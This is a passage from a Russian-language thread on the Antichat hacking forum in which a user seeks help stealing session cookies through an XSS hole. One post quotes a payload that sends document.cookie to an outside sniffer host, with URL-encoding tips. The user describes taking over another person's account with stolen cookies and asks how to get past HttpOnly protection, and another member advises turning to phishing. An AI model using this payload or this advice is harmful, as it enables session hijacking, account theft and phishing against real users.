HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу нашол такую хсс
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.08.2015, 16:30
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию
Цитата:
Сообщение от yarbabin  

какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +
очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg
 
Ответить с цитированием

  #12  
Старый 17.08.2015, 17:05
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию
Цитата:
Сообщение от Octavian  

очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак
нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня
прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс
http://incomas.md/shop/2015.jpg
https://www.owasp.org/index.php/HttpOnly
 
Ответить с цитированием

  #13  
Старый 17.08.2015, 17:19
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию
Цитата:
Сообщение от grimnir  
na ruskom netu? i shto ea doljen poniati?
 
Ответить с цитированием

  #14  
Старый 17.08.2015, 17:29
funny_kaplan
Познающий
Регистрация: 28.03.2013
Сообщений: 43
Провел на форуме:
16571

Репутация: 0
По умолчанию
Цитата:
Сообщение от Octavian  

na ruskom netu? i shto ea doljen poniati?
Невозможно получить значение kogaionon_data, потому что javascript не имеет доступа к кукам, которые имеют флаг HttpOnly(передаётся в заголовках браузеру, но JS-ом их не выцепить)

Юзай фишинг.
 
Ответить с цитированием

  #15  
Старый 17.08.2015, 17:33
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию
Цитата:
Сообщение от funny_kaplan  

Невозможно получить значение kogaionon_data, потому что javascript не имеет доступа к кукам, которые имеют флаг HttpOnly(передаётся в заголовках браузеру, но JS-ом их не выцепить)
Юзай фишинг.
nikokovo tolka ot etoi xss? da kakoi normalinii admin povedeotsea na fhising *
 
Ответить с цитированием

  #16  
Старый 17.08.2015, 21:33
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию
да дело в HttpOnly ево никак обоити невозможно?
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.